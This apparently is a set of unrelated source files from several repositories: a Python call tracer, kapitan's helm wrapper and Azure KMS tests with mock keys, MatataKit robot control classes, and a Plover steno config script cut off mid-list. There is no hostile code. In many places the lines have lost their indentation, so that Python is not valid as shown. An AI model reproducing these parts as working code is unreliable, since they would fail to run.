# print 'frame.f_code.co_name: %s' % frame.f_code.co_name
# print 'frame.f_code.co_filename: %s' % frame.f_code.co_filename
# print 'frame.f_lineno: %s' % frame.f_lineno
line_number = frame.f_lineno
line = linecache.getline(frame.f_code.co_filename, frame.f_lineno)
# print 'line: %s' % line
# name = frame.f_globals['__name__']
    print(' %s:%d %s' % (frame.f_code.co_name, line_number, line.rstrip()))
# for line in traceback.format_stack():
# print(line.strip())
# if event != 'line':
# return
# co = frame.f_code
# func_name = co.co_name
# line_no = frame.f_lineno
# filename = co.co_filename
# print ' %s line %s' % (func_name, line_no)
def trace_service_v2(frame, event, arg):
if event != 'call':
return
if frame.f_code.co_name == '_remove':
return
    if 'pydev/dev' not in frame.f_code.co_filename:
return
# print '\n----- trace_call ----------------------------------------------'
# print 'frame: %s' % frame
# print 'event: %s' % event
# print 'arg: %s' % arg
#
# print 'frame: %s' % frame
# print 'frame.f_code: %s' % frame.f_code
# print 'frame.f_code.co_name: %s' % frame.f_code.co_name
# print 'frame.f_code.co_filename: %s' % frame.f_code.co_filename
# print 'frame.f_lineno: %s' % frame.f_lineno
#
# print 'frame.f_back: %s' % frame.f_back
# print 'frame.f_back.f_code: %s' % frame.f_back.f_code
# print 'frame.f_back.f_code.co_name: %s' % frame.f_back.f_code.co_name
# print 'frame.f_back.f_code.co_filename: %s' % frame.f_back.f_code.co_filename
# print 'frame.f_back.f_lineno: %s' % frame.f_back.f_lineno
    print('\n#', frame.f_code.co_name)
    print('Call to %s on line %s of %s' % (frame.f_code.co_name, frame.f_lineno, frame.f_code.co_filename))
    args, _, _, values = inspect.getargvalues(frame)
    # print(' arguments for function "%s"' % inspect.getframeinfo(frame)[2])
    print(' arguments')
    for i in args:
        print(" %s = %s" % (i, values[i]))
# print 'calling trace_lines'
    return trace_line_v2
```
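trace_service_v2 is meant to be installed as the interpreter's global trace hook: it fires on 'call' events, prints the call site and arguments, and returns trace_line_v2 so that each executed line of the traced function is echoed as well. A minimal wiring sketch (an assumption about intended usage, not part of the module; note that the hard-coded 'pydev/dev' filename filter above means only files under such a path are traced, so adjust or remove that check for other code):
```python
import sys
import tracing_service

def demo(x, y):
    total = x + y
    return total

sys.settrace(tracing_service.trace_service_v2)  # install the call/line tracer
demo(1, 2)
sys.settrace(None)  # uninstall the hook
```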
|
{
"source": "Jean-Daniel/kapitan",
"score": 2
}
|
#### File: kapitan/kapitan/helm_cli.py
```python
import logging
import os
import subprocess
from subprocess import PIPE, DEVNULL
logger = logging.getLogger(__name__)
def helm_cli(helm_path, args, stdout=None, verbose=False):
    # If helm_path is not specified, try the KAPITAN_HELM_PATH env var, and default to looking up helm in the PATH.
if not helm_path:
helm_path = os.getenv("KAPITAN_HELM_PATH", "helm")
try:
logger.debug("launching helm with arguments: %s", args)
res = subprocess.run(
args=[helm_path] + args, stderr=PIPE, stdout=stdout or (PIPE if verbose else DEVNULL)
)
if verbose and not stdout:
for line in res.stdout.splitlines():
if line:
logger.debug("[helm] %s", line.decode())
return res.stderr.decode() if res.returncode != 0 else ""
except FileNotFoundError:
return "helm binary not found. helm must be present in the PATH to use kapitan helm functionalities"
```
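helm_cli returns an empty string on success and the captured stderr on failure, so callers can treat its return value as an error message. A hypothetical call site (the chart path and values file are illustrative, not from the repository):
```python
error = helm_cli(None, ["template", "charts/mychart", "--values", "values.yaml"], verbose=True)
if error:
    raise RuntimeError("helm failed: " + error)
```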
#### File: kapitan/tests/test_azure.py
```python
"Azure secrets test"
import os
import tempfile
import unittest
import io
import sys
import contextlib
from kapitan import cached
from kapitan.cli import main
from kapitan.refs.base import RefController, RefParams, Revealer
from kapitan.refs.secrets.azkms import AzureKMSSecret, AzureKMSError
REFS_HOME = tempfile.mkdtemp()
REF_CONTROLLER = RefController(REFS_HOME)
REVEALER = Revealer(REF_CONTROLLER)
REF_CONTROLLER_EMBEDDED = RefController(REFS_HOME, embed_refs=True)
REVEALER_EMBEDDED = Revealer(REF_CONTROLLER_EMBEDDED)
class AzureKMSTest(unittest.TestCase):
"Test Azure key vault secrets"
def test_azkms_write_reveal(self):
"""
Write secret, confirm secret file exists, reveal and compare content
"""
tag = "?{azkms:secret/test}"
REF_CONTROLLER[tag] = AzureKMSSecret("mock", "mock")
self.assertTrue(os.path.isfile(os.path.join(REFS_HOME, "secret/test")))
file_with_secret_tags = tempfile.mktemp()
with open(file_with_secret_tags, "w") as fp:
fp.write("I am a ?{azkms:secret/test} value")
revealed = REVEALER.reveal_raw_file(file_with_secret_tags)
self.assertEqual("I am a mock value", revealed)
def test_azkms_write_embedded_reveal(self):
"""
        Write and compile embedded secret, confirm secret file exists, reveal and compare content
"""
tag = "?{azkms:secret/test}"
REF_CONTROLLER_EMBEDDED[tag] = AzureKMSSecret("mock", "mock")
self.assertTrue(os.path.isfile(os.path.join(REFS_HOME, "secret/test")))
ref_obj = REF_CONTROLLER_EMBEDDED[tag]
file_with_secret_tags = tempfile.mktemp()
with open(file_with_secret_tags, "w") as fp:
fp.write(f"I am a {ref_obj.compile()} value")
revealed = REVEALER_EMBEDDED.reveal_raw_file(file_with_secret_tags)
self.assertEqual("I am a mock value", revealed)
def test_cli_secret_write_reveal_azkms(self):
"""
run $ kapitan refs --write azkms:test_secret
and $ kapitan refs --reveal
using mock key
"""
test_secret_content = "mock"
test_secret_file = tempfile.mktemp()
with open(test_secret_file, "w") as fp:
fp.write(test_secret_content)
sys.argv = [
"kapitan",
"refs",
"--write",
"azkms:test_secret",
"-f",
test_secret_file,
"--refs-path",
REFS_HOME,
"--key",
"mock",
]
main()
test_tag_content = "revealing: ?{azkms:test_secret}"
test_tag_file = tempfile.mktemp()
with open(test_tag_file, "w") as fp:
fp.write(test_tag_content)
sys.argv = ["kapitan", "refs", "--reveal", "-f", test_tag_file, "--refs-path", REFS_HOME]
stdout = io.StringIO()
with contextlib.redirect_stdout(stdout):
main()
self.assertEqual(f"revealing: {test_secret_content}", stdout.getvalue())
os.remove(test_tag_file)
def tearDown(self):
cached.reset_cache()
```
|
{
"source": "Jean-Daniel/MatataKit",
"score": 3
}
|
#### File: python/controller/color_sensor.py
```python
class color_sensor:
    # Color codes understood by the color query command (0x20, group 0x01).
    _COLOR_CODES = {
        'white': 0x01,
        'red': 0x02,
        'yellow': 0x03,
        'green': 0x04,
        'blue': 0x05,
        'purple': 0x06,
        'black': 0x07,
    }
    def __init__(self, call):
        self.call = call
    def get_light_strength(self):
        self.call.blewrite([0x28, 0x02, 0x04])
        r = self.call.blewait(0x28)
        if r is None:
            return 0
        return r[4]
    def _query(self, group, code):
        # Send one query packet and report whether the sensor answered positively.
        self.call.blewrite([0x20, group, code])
        r = self.call.blewait(0x20)
        return r is not None and r[4] > 0
    def is_white(self):
        return self._query(0x01, self._COLOR_CODES['white'])
    def is_red(self):
        return self._query(0x01, self._COLOR_CODES['red'])
    def is_yellow(self):
        return self._query(0x01, self._COLOR_CODES['yellow'])
    def is_green(self):
        return self._query(0x01, self._COLOR_CODES['green'])
    def is_blue(self):
        return self._query(0x01, self._COLOR_CODES['blue'])
    def is_purple(self):
        return self._query(0x01, self._COLOR_CODES['purple'])
    def is_black(self):
        return self._query(0x01, self._COLOR_CODES['black'])
    def is_bright(self):
        # Ambient light queries use group 0x05 instead of the color group.
        return self._query(0x05, 0x01)
    def is_dark(self):
        return self._query(0x05, 0x02)
```
#### File: python/controller/timer.py
```python
import sys
import math
import random
import time
import imp
class timer:
def __init__(self, call):
self.call = call
def sleep(self, t):
if isinstance(t, int):
for num in range(0, t, 1):
time.sleep(1)
elif isinstance(t, float):
time.sleep(t*1.13)
def sleep_unit_time(self, t):
t_ = 0
if isinstance(t, int):
t_ = t
elif isinstance(t, float):
t_ = round(t)
elif isinstance(t, str):
t_ = int(t)
time.sleep(t_*0.88)
```
#### File: python/matatabot/emotion.py
```python
import sys
import math
import random
class emotion:
def __init__(self, call):
self.call = call
def look_around(self):
data = [0x16, 0x01, 0x01]
self.call.blewrite(data)
self.call.blewait()
def smile(self):
data = [0x16, 0x01, 0x27]
self.call.blewrite(data)
self.call.blewait()
def wow(self):
data = [0x16, 0x01, 0x2f]
self.call.blewrite(data)
self.call.blewait()
def naughty(self):
data = [0x16, 0x01, 0x05]
self.call.blewrite(data)
self.call.blewait()
def hello(self):
data = [0x16, 0x01, 0x21]
self.call.blewrite(data)
self.call.blewait()
def proud(self):
data = [0x16, 0x01, 0x07]
self.call.blewrite(data)
self.call.blewait()
def yummy(self):
data = [0x16, 0x01, 0x08]
self.call.blewrite(data)
self.call.blewait()
def uh_oh(self):
data = [0x16, 0x01, 0x29]
self.call.blewrite(data)
self.call.blewait()
def hurt(self):
data = [0x16, 0x01, 0x0a]
self.call.blewrite(data)
self.call.blewait()
def shiver(self):
data = [0x16, 0x01, 0x0b]
self.call.blewrite(data)
self.call.blewait()
def startle(self):
data = [0x16, 0x01, 0x0c]
self.call.blewrite(data)
self.call.blewait()
def zzz(self):
data = [0x16, 0x01, 0x24]
self.call.blewrite(data)
self.call.blewait()
def wake_up(self):
data = [0x16, 0x01, 0x0e]
self.call.blewrite(data)
self.call.blewait()
def sleepy(self):
data = [0x16, 0x01, 0x26]
self.call.blewrite(data)
self.call.blewait()
def dizzy(self):
data = [0x16, 0x01, 0x10]
self.call.blewrite(data)
self.call.blewait()
def goodbye(self):
data = [0x16, 0x01, 0x2e]
self.call.blewrite(data)
self.call.blewait()
def no(self):
data = [0x16, 0x01, 0x2b]
self.call.blewrite(data)
self.call.blewait()
def yes(self):
data = [0x16, 0x01, 0x28]
self.call.blewrite(data)
self.call.blewait()
def angry(self):
data = [0x16, 0x01, 0x29]
self.call.blewrite(data)
self.call.blewait()
def crying(self):
data = [0x22, 0x01]
self.call.blewrite(data)
self.call.blewait()
def action(self, action_num):
data = [0x13, 0x01]
if(action_num == "action1"):
data[1] = 0x01
elif(action_num == "action2"):
data[1] = 0x02
elif(action_num == "action3"):
data[1] = 0x03
elif(action_num == "action4"):
data[1] = 0x04
elif(action_num == "action5"):
data[1] = 0x05
elif(action_num == "action6"):
data[1] = 0x06
elif(action_num == "random"):
data[1] = random.randint(1, 6)
self.call.blewrite(data)
def dance(self, action_num):
data = [0x12, 0x01]
if(action_num == "dance1"):
data[1] = 0x01
elif(action_num == "dance2"):
data[1] = 0x02
elif(action_num == "dance3"):
data[1] = 0x03
elif(action_num == "dance4"):
data[1] = 0x04
elif(action_num == "dance5"):
data[1] = 0x05
elif(action_num == "dance6"):
data[1] = 0x06
elif(action_num == "random"):
data[1] = random.randint(1, 6)
self.call.blewrite(data)
```
#### File: python/matatabot/leds.py
```python
import sys
import math
import random
class leds:
def __init__(self, call):
self.call = call
def show_next1(self, color, index):
data = [0x22, 0x01]
self.call.blewrite(data)
self.call.blewait()
def show_single(self, leftright, r, g, b):
data = [0x17, 0x01, 0x00, 0x00, 0x00]
if(leftright == "left"):
data[1] = 0x01
elif(leftright == "right"):
data[1] = 0x02
elif(leftright == "all"):
data[1] = 0x03
data[2] = r
data[3] = g
data[4] = b
self.call.blewrite(data)
self.call.blewait()
def show_all(self, r, g, b):
data = [0x17, 0x01, 0x00, 0x00, 0x00]
data[1] = 0x03
data[2] = r
data[3] = g
data[4] = b
self.call.blewrite(data)
self.call.blewait()
def color(self, value):
digit = list(map(str, range(10)))+list("abcdef")
if(isinstance(value, tuple)):
string = '#'
for i in value:
a1 = i//16
a2 = i % 16
string += digit[a1]+digit[a2]
return string
elif isinstance(value, str):
a1 = digit.index(value[1])*16+digit.index(value[2])
a2 = digit.index(value[3])*16+digit.index(value[4])
a3 = digit.index(value[5])*16+digit.index(value[6])
return [a1, a2, a3]
def trun_ring(self, buf, col):
arr = self.color(col)
buf.append(arr[0])
buf.append(arr[1])
buf.append(arr[2])
return buf
def show_all_hex(self, color):
data = [0x17, 0x03]
data = self.trun_ring(data, color)
self.call.blewrite(data)
self.call.blewait()
def show_single_hex(self, index, color):
data = [0x17, 0x01]
if(index == "left"):
data[1] = 0x01
elif(index == "right"):
data[1] = 0x02
elif(index == "all"):
data[1] = 0x03
data = self.trun_ring(data, color)
self.call.blewrite(data)
self.call.blewait()
def clear(self):
data = [0x17, 0x03, 0x00, 0x00, 0x00]
self.call.blewrite(data)
self.call.blewait()
```
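The color helper above converts between an (r, g, b) tuple and a '#rrggbb' hex string, which is what trun_ring uses to append the three channel bytes to an outgoing packet. A small round-trip check (the no-op BLE stub exists only to satisfy the constructor):
```python
class _NoopBLE:
    def blewrite(self, data):
        pass
    def blewait(self, *args):
        return None

l = leds(_NoopBLE())
assert l.color((255, 0, 128)) == '#ff0080'
assert l.color('#ff0080') == [255, 0, 128]
```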
#### File: python/matatabot/motion.py
```python
import sys
import math
import random
class motion:
def __init__(self, call):
self.call = call
def forward_step(self, step):
data = [0x10, 0x01, 0x00, 0x00]
mm = 100
data[2] = mm//256
data[3] = mm % 256
for i in range(0, step):
self.call.blewrite(data)
self.call.blewait(0x88)
def forward(self, step):
data = [0x10, 0x01, 0x00, 0x00]
mm = None
if isinstance(step, (int, float)):
mm = round(step)
mm = mm*10
elif isinstance(step, str):
if(step == "step_1"):
self.forward_step(1)
return
elif(step == "step_2"):
self.forward_step(2)
return
elif(step == "step_3"):
self.forward_step(3)
return
elif(step == "step_4"):
self.forward_step(4)
return
elif(step == "step_5"):
self.forward_step(5)
return
elif(step == "step_6"):
self.forward_step(6)
return
elif(step == "random_step"):
mm = random.randint(1, 6)
self.forward_step(mm)
return
elif(step == "random"):
mm = random.randint(1, 6)
mm = mm*100
        if mm is None:
            # Unrecognized argument: fall back to one step (100 mm), as backward() does.
            mm = 100
data[2] = mm//256
data[3] = mm % 256
self.call.blewrite(data)
self.call.blewait(0x88)
def backward_step(self, step):
data = [0x10, 0x02, 0x00, 0x00]
mm = 100
data[2] = mm//256
data[3] = mm % 256
for i in range(0, step):
self.call.blewrite(data)
self.call.blewait(0x88)
def backward(self, step):
data = [0x10, 0x02, 0x00, 0x00]
mm = None
if isinstance(step, int):
mm = step
mm = mm*10
elif isinstance(step, float):
mm = round(step)
mm = mm*10
elif isinstance(step, str):
if(step == "step_1"):
self.backward_step(1)
return
elif(step == "step_2"):
self.backward_step(2)
return
elif(step == "step_3"):
self.backward_step(3)
return
elif(step == "step_4"):
self.backward_step(4)
return
elif(step == "step_5"):
self.backward_step(5)
return
elif(step == "step_6"):
self.backward_step(6)
return
elif(step == "random_step"):
mm = random.randint(1, 6)
self.backward_step(mm)
return
elif(step == "random"):
mm = random.randint(1, 6)
mm = mm*100
else:
mm = 100
data[2] = mm//256
data[3] = mm % 256
self.call.blewrite(data)
self.call.blewait(0x88)
def turn_left(self, angle):
data = [0x10, 0x03, 0x00, 0x00]
mm = None
if isinstance(angle, int):
mm = angle
elif isinstance(angle, float):
mm = round(angle)
elif isinstance(angle, str):
if(angle == "random"):
mm = random.randint(30, 180)
elif(angle == "30degree"):
mm = 30
elif(angle == "36degree"):
mm = 36
elif(angle == "45degree"):
mm = 45
elif(angle == "60degree"):
mm = 60
elif(angle == "72degree"):
mm = 72
elif(angle == "90degree"):
mm = 90
elif(angle == "108degree"):
mm = 108
elif(angle == "120degree"):
mm = 120
elif(angle == "135degree"):
mm = 135
elif(angle == "145degree"):
mm = 145
elif(angle == "150degree"):
mm = 150
elif(angle == "180degree"):
mm = 180
else:
mm = 30
data[2] = mm//256
data[3] = mm % 256
self.call.blewrite(data)
self.call.blewait()
def turn_right(self, angle: int):
data = [0x10, 0x04, 0x00, 0x00]
mm = None
if isinstance(angle, int):
mm = angle
elif isinstance(angle, float):
mm = round(angle)
elif isinstance(angle, str):
if(angle == "random"):
mm = random.randint(30, 180)
elif(angle == "30degree"):
mm = 30
elif(angle == "36degree"):
mm = 36
elif(angle == "45degree"):
mm = 45
elif(angle == "60degree"):
mm = 60
elif(angle == "72degree"):
mm = 72
elif(angle == "90degree"):
mm = 90
elif(angle == "108degree"):
mm = 108
elif(angle == "120degree"):
mm = 120
elif(angle == "135degree"):
mm = 135
elif(angle == "145degree"):
mm = 145
elif(angle == "150degree"):
mm = 150
elif(angle == "180degree"):
mm = 180
else:
mm = 30
data[2] = mm//256
data[3] = mm % 256
self.call.blewrite(data)
self.call.blewait()
def move_position(self, position):
# print(str(position))
if(float(position) > 9999):
position = 9999
if(float(position) < -9999):
position = -9999
position = position*10
position = round(position)
data = [0x10, 0x01, 0x00, 0x00]
mm = None
if(position > 0):
data[1] = 0x01
if(position > 1000):
position = 1000
mm = position
else:
data[1] = 0x02
if(position < -1000):
position = -1000
mm = 0-position
data[2] = mm//256
data[3] = mm % 256
self.call.blewrite(data)
self.call.blewait()
def move_angle(self, angle):
if(float(angle) > 9999):
angle = 9999
if(float(angle) < -9999):
angle = -9999
angle = round(angle)
data = [0x10, 0x03, 0x00, 0x00]
mm = None
if(angle > 0):
data[1] = 0x04
if(angle > 360):
angle = 360
mm = angle
else:
data[1] = 0x03
if(angle < -360):
angle = -360
mm = 0-angle
data[2] = mm//256
data[3] = mm % 256
self.call.blewrite(data)
self.call.blewait()
def move_speed(self, left_speed, right_speed):
left_s = 0
right_s = 0
data = [0x11, 0x03, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00]
if isinstance(left_speed, int):
left_s = 144*left_speed/9.70
elif isinstance(left_speed, float):
left_s = 144*left_speed/9.70
elif isinstance(left_speed, str):
if(left_speed == "gear_1"):
left_s = 70
elif(left_speed == "gear_2"):
left_s = 105
elif(left_speed == "gear_3"):
left_s = 140
elif(left_speed == "gear_4"):
left_s = 175
elif(left_speed == "gear_5"):
left_s = 210
elif(left_speed == "gear_6"):
left_s = 245
elif(left_speed == "inf"):
left_s = 245
elif(left_speed == "gear_stop"):
left_s = 0
elif(left_speed == "gear_random"):
a = random.randint(0, 5)
left_s = 70+35*a
elif(left_speed == "backgear_1"):
left_s = -70
elif(left_speed == "backgear_2"):
left_s = -105
elif(left_speed == "backgear_3"):
left_s = -140
elif(left_speed == "backgear_4"):
left_s = -175
elif(left_speed == "backgear_5"):
left_s = -175
elif(left_speed == "backgear_6"):
left_s = -210
elif(left_speed == "-inf"):
left_s = -210
elif(left_speed == "backgear_stop"):
left_s = 0
elif(left_speed == "backgear_random"):
a = random.randint(0, 5)
left_s = -70-35*a
if isinstance(right_speed, int):
right_s = 144*right_speed/9.70
elif isinstance(right_speed, float):
right_s = 144*right_speed/9.70
elif isinstance(right_speed, str):
if(right_speed == "gear_1"):
right_s = 70
elif(right_speed == "gear_2"):
right_s = 105
elif(right_speed == "gear_3"):
right_s = 140
elif(right_speed == "gear_4"):
right_s = 175
elif(right_speed == "gear_5"):
right_s = 210
elif(right_speed == "gear_6"):
right_s = 245
elif(right_speed == "inf"):
right_s = 245
elif(right_speed == "gear_stop"):
right_s = 0
elif(right_speed == "gear_random"):
a = random.randint(0, 5)
right_s = 70+35*a
elif(right_speed == "backgear_1"):
right_s = -70
elif(right_speed == "backgear_2"):
right_s = -105
elif(right_speed == "backgear_3"):
right_s = -140
elif(right_speed == "backgear_4"):
right_s = -175
elif(right_speed == "backgear_5"):
right_s = -175
elif(right_speed == "backgear_6"):
right_s = -210
elif(right_speed == "-inf"):
right_s = -210
elif(right_speed == "backgear_stop"):
right_s = 0
elif(right_speed == "backgear_random"):
a = random.randint(0, 5)
right_s = -70-35*a
if(left_s > 0):
left_s = left_s
data[2] = 0x01
else:
left_s = 0-left_s
data[2] = 0x02
if(right_s > 0):
right_s = right_s
data[5] = 0x01
else:
right_s = 0-right_s
data[5] = 0x02
left_s = round(left_s)
right_s = round(right_s)
data[3] = left_s//256
data[4] = left_s % 256
data[6] = right_s//256
data[7] = right_s % 256
self.call.blewrite(data)
def move_right_speed(self, right_speed):
right_s = 0
data = [0x11, 0x01, 0x01, 0x00, 0x00]
if isinstance(right_speed, int):
right_s = 144*right_speed/9.70
elif isinstance(right_speed, float):
right_s = 144*right_speed/9.70
elif isinstance(right_speed, str):
if(right_speed == "gear_1"):
right_s = 70
elif(right_speed == "gear_2"):
right_s = 105
elif(right_speed == "gear_3"):
right_s = 140
elif(right_speed == "gear_4"):
right_s = 175
elif(right_speed == "gear_5"):
right_s = 210
elif(right_speed == "gear_6"):
right_s = 245
elif(right_speed == "inf"):
right_s = 245
elif(right_speed == "gear_stop"):
right_s = 0
elif(right_speed == "gear_random"):
a = random.randint(0, 5)
right_s = 70+35*a
elif(right_speed == "backgear_1"):
right_s = -70
elif(right_speed == "backgear_2"):
right_s = -105
elif(right_speed == "backgear_3"):
right_s = -140
elif(right_speed == "backgear_4"):
right_s = -175
elif(right_speed == "backgear_5"):
right_s = -175
elif(right_speed == "backgear_6"):
right_s = -210
elif(right_speed == "-inf"):
right_s = -210
elif(right_speed == "backgear_stop"):
right_s = 0
elif(right_speed == "backgear_random"):
a = random.randint(0, 5)
right_s = -70-35*a
if(right_s > 0):
right_s = right_s
data[2] = 0x01
else:
right_s = 0-right_s
data[2] = 0x02
right_s = round(right_s)
data[3] = right_s//256
data[4] = right_s % 256
self.call.blewrite(data)
def move_left_speed(self, left_speed):
left_s = 0
data = [0x11, 0x02, 0x01, 0x00, 0x00]
if isinstance(left_speed, int):
left_s = 144*left_speed/9.70
elif isinstance(left_speed, float):
left_s = 144*left_speed/9.70
elif isinstance(left_speed, str):
if(left_speed == "gear_1"):
left_s = 70
elif(left_speed == "gear_2"):
left_s = 105
elif(left_speed == "gear_3"):
left_s = 140
elif(left_speed == "gear_4"):
left_s = 175
elif(left_speed == "gear_5"):
left_s = 210
elif(left_speed == "gear_6"):
left_s = 245
elif(left_speed == "inf"):
left_s = 245
elif(left_speed == "gear_stop"):
left_s = 0
elif(left_speed == "gear_random"):
a = random.randint(0, 5)
left_s = 70+35*a
elif(left_speed == "backgear_1"):
left_s = -70
elif(left_speed == "backgear_2"):
left_s = -105
elif(left_speed == "backgear_3"):
left_s = -140
elif(left_speed == "backgear_4"):
left_s = -175
elif(left_speed == "backgear_5"):
left_s = -175
elif(left_speed == "backgear_6"):
left_s = -210
elif(left_speed == "-inf"):
left_s = -210
elif(left_speed == "backgear_stop"):
left_s = 0
elif(left_speed == "backgear_random"):
a = random.randint(0, 5)
left_s = -70-35*a
if(left_s > 0):
left_s = left_s
data[2] = 0x01
else:
left_s = 0-left_s
data[2] = 0x02
left_s = round(left_s)
data[3] = left_s//256
data[4] = left_s % 256
self.call.blewrite(data)
def stop(self, wheel):
data = None
if(wheel == "left"):
data = [0x11, 0x01, 0x01, 0x00, 0x00]
elif(wheel == "right"):
data = [0x11, 0x02, 0x01, 0x00, 0x00]
elif(wheel == "all"):
data = [0x11, 0x03, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00]
else:
data = [0x11, 0x03, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00]
self.call.blewrite(data)
```
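Throughout move_speed and friends, numeric speeds are converted with 144 * speed / 9.70 internal units, while the named gears are fixed unit values (gear_1 = 70, up to gear_6 = 245). A small sketch of that conversion, using the constants from the code above (interpreting the numeric argument as cm/s is an assumption; the units are not documented in the source):
```python
# Conversion used by motion.move_*_speed (constants taken from the code above).
def speed_to_units(speed):
    return round(144 * speed / 9.70)

speed_to_units(9.70)       # -> 144 internal units
round(70 * 9.70 / 144, 1)  # -> 4.7, the approximate input value matching "gear_1"
```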
|
{
"source": "jeandeaual/dotfiles",
"score": 3
}
|
#### File: .chezmoitemplates/Plover/modify_plover.cfg.py
```python
from __future__ import annotations
from configparser import ConfigParser, NoOptionError, NoSectionError
from enum import Enum, unique
from json import dumps
from sys import stdin, stdout
from typing import Any
@unique
class Section(Enum):
"""Plover configuration file sections."""
MACHINE_CONFIGURATION = "Machine Configuration"
TX_BOLT = "TX Bolt"
GEMINI_PR = "Gemini PR"
OUTPUT_CONFIGURATION = "Output Configuration"
TRANSLATION_FRAME = "Translation Frame"
STROKE_DISPLAY = "Stroke Display"
SYSTEM = "System"
SUGGESTIONS_DISPLAY = "Suggestions Display"
GUI = "GUI"
LOGGING_CONFIGURATION = "Logging Configuration"
KEYBOARD = "Keyboard"
STARTUP = "Startup"
SYSTEM_ENGLISH = "System: English Stenotype"
SYSTEM_GRANDJEAN = "System: Grandjean"
@unique
class SpacePlacement(Enum):
"""Plover output configuration space placement options."""
BEFORE = "Before Output"
AFTER = "After Output"
def set_config_value(
config: ConfigParser, section: Section, option: str, value: Any
):
"""
Set a configuration value.
:param section: The section of the configuration to set.
:param option: The option to set.
:param value: The value to set.
"""
str_value = str(value)
try:
current_value = config.get(section.value, option)
if current_value != str_value:
config.set(section.value, option, str_value)
except NoSectionError:
config.add_section(section.value)
config.set(section.value, option, str_value)
except NoOptionError:
config.set(section.value, option, str_value)
def set_json_config_value(
config: ConfigParser, section: Section, option: str, value: Any
):
"""
Set a JSON configuration value.
:param section: The section of the configuration to set.
:param option: The option to set.
:param value: The value to set.
"""
set_config_value(config, section, option, dumps(value))
# Read the configuration
config = ConfigParser()
config.read_file(stdin)
section = Section.MACHINE_CONFIGURATION
set_config_value(config, section, "auto_start", True)
section = Section.OUTPUT_CONFIGURATION
set_config_value(config, section, "undo_levels", 100)
set_config_value(config, section, "start_attached", True)
set_config_value(config, section, "start_capitalized", True)
set_config_value(config, section, "space_placement", SpacePlacement.BEFORE)
section = Section.STROKE_DISPLAY
set_config_value(config, section, "show", True)
section = Section.SUGGESTIONS_DISPLAY
set_config_value(config, section, "show", True)
section = Section.GUI
set_config_value(config, section, "classic_dictionaries_display_order", False)
section = Section.SYSTEM_ENGLISH
set_json_config_value(
config,
section,
"dictionaries",
[
{
"enabled": True,
"path": dictionary_path,
}
for dictionary_path in [
"show-strokes.py",
"user-commands.json",
"user.json",
"emoji.json",
"punctuation.json",
"numbers.json",
"fingerspelling.json",
"dict.json",
"condensed-strokes.json",
"condensed-strokes-fingerspelled.json",
]
],
)
# Default QWERTY configuration
set_json_config_value(
config,
section,
"keymap[keyboard]",
[
[
"#",
["1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "-", "="],
],
[
"S-",
["q", "a"],
],
[
"T-",
["w"],
],
[
"K-",
["s"],
],
[
"P-",
["e"],
],
[
"W-",
["d"],
],
[
"H-",
["r"],
],
[
"R-",
["f"],
],
[
"A-",
["c"],
],
[
"O-",
["v"],
],
[
"*",
["t", "y", "g", "h"],
],
[
"-E",
["n"],
],
[
"-U",
["m"],
],
[
"-F",
["u"],
],
[
"-R",
["j"],
],
[
"-P",
["i"],
],
[
"-B",
["k"],
],
[
"-L",
["o"],
],
[
"-G",
["l"],
],
[
"-T",
["p"],
],
[
"-S",
[";"],
],
[
"-D",
["["],
],
[
"-Z",
["'"],
],
[
"arpeggiate",
["space"],
],
[
"no-op",
["\\", "]", "z", "x", "b", ",", ".", "/"],
],
],
)
# Default configuration
set_json_config_value(
config,
section,
"keymap[tx bolt]",
[
[
"#",
["#"],
],
[
"S-",
["S-"],
],
[
"T-",
["T-"],
],
[
"K-",
["K-"],
],
[
"P-",
["P-"],
],
[
"W-",
["W-"],
],
[
"H-",
["H-"],
],
[
"R-",
["R-"],
],
[
"A-",
["A-"],
],
[
"O-",
["O-"],
],
[
"*",
["*"],
],
[
"-E",
["-E"],
],
[
"-U",
["-U"],
],
[
"-F",
["-F"],
],
[
"-R",
["-R"],
],
[
"-P",
["-P"],
],
[
"-B",
["-B"],
],
[
"-L",
["-L"],
],
[
"-G",
["-G"],
],
[
"-T",
["-T"],
],
[
"-S",
["-S"],
],
[
"-D",
["-D"],
],
[
"-Z",
["-Z"],
],
[
"no-op",
[],
],
],
)
# Default configuration
set_json_config_value(
config,
section,
"keymap[gemini pr]",
[
[
"#",
[
"#1",
"#2",
"#3",
"#4",
"#5",
"#6",
"#7",
"#8",
"#9",
"#A",
"#B",
"#C",
],
],
[
"S-",
["S1-", "S2-"],
],
[
"T-",
["T-"],
],
[
"K-",
["K-"],
],
[
"P-",
["P-"],
],
[
"W-",
["W-"],
],
[
"H-",
["H-"],
],
[
"R-",
["R-"],
],
[
"A-",
["A-"],
],
[
"O-",
["O-"],
],
[
"*",
["*1", "*3", "*2", "*4"],
],
[
"-E",
["-E"],
],
[
"-U",
["-U"],
],
[
"-F",
["-F"],
],
[
"-R",
["-R"],
],
[
"-P",
["-P"],
],
[
"-B",
["-B"],
],
[
"-L",
["-L"],
],
[
"-G",
["-G"],
],
[
"-T",
["-T"],
],
[
"-S",
["-S"],
],
[
"-D",
["-D"],
],
[
"-Z",
["-Z"],
],
[
"no-op",
["Fn", "pwr", "res1", "res2"],
],
],
)
section = Section.SYSTEM_GRANDJEAN
set_json_config_value(
config,
section,
"dictionaries",
[
{
"enabled": True,
"path": dictionary_path,
}
for dictionary_path in [
"french-user.json",
"07_french_user.json",
"06_french_verbes.json",
"05_french_noms.json",
"04_french_adjectifs.json",
"03_french_adverbes.json",
"02_french_chiffres.json",
"01_french_sion.json",
]
],
)
# Default QWERTY configuration
set_json_config_value(
config,
section,
"keymap[keyboard]",
[
[
"S-",
["q"],
],
[
"K-",
["a"],
],
[
"P-",
["w"],
],
[
"M-",
["s"],
],
[
"T-",
["e"],
],
[
"F-",
["d"],
],
[
"*",
["r"],
],
[
"R-",
["f"],
],
[
"N-",
["t"],
],
[
"L-",
["g", "v"],
],
[
"Y-",
["h", "b"],
],
[
"-O",
["y"],
],
[
"-E",
["n"],
],
[
"-A",
["u"],
],
[
"-U",
["j"],
],
[
"-I",
["i"],
],
[
"-l",
["k"],
],
[
"-n",
["o"],
],
[
"-$",
["l"],
],
[
"-D",
["p"],
],
[
"-C",
[","],
],
[
"arpeggiate",
["space"],
],
[
"no-op",
[],
],
],
)
# Configuration for the Splitography
set_json_config_value(
config,
section,
"keymap[gemini pr]",
[
[
"S-",
["S1-"],
],
[
"K-",
["S2-"],
],
[
"P-",
["T-"],
],
[
"M-",
["K-"],
],
[
"T-",
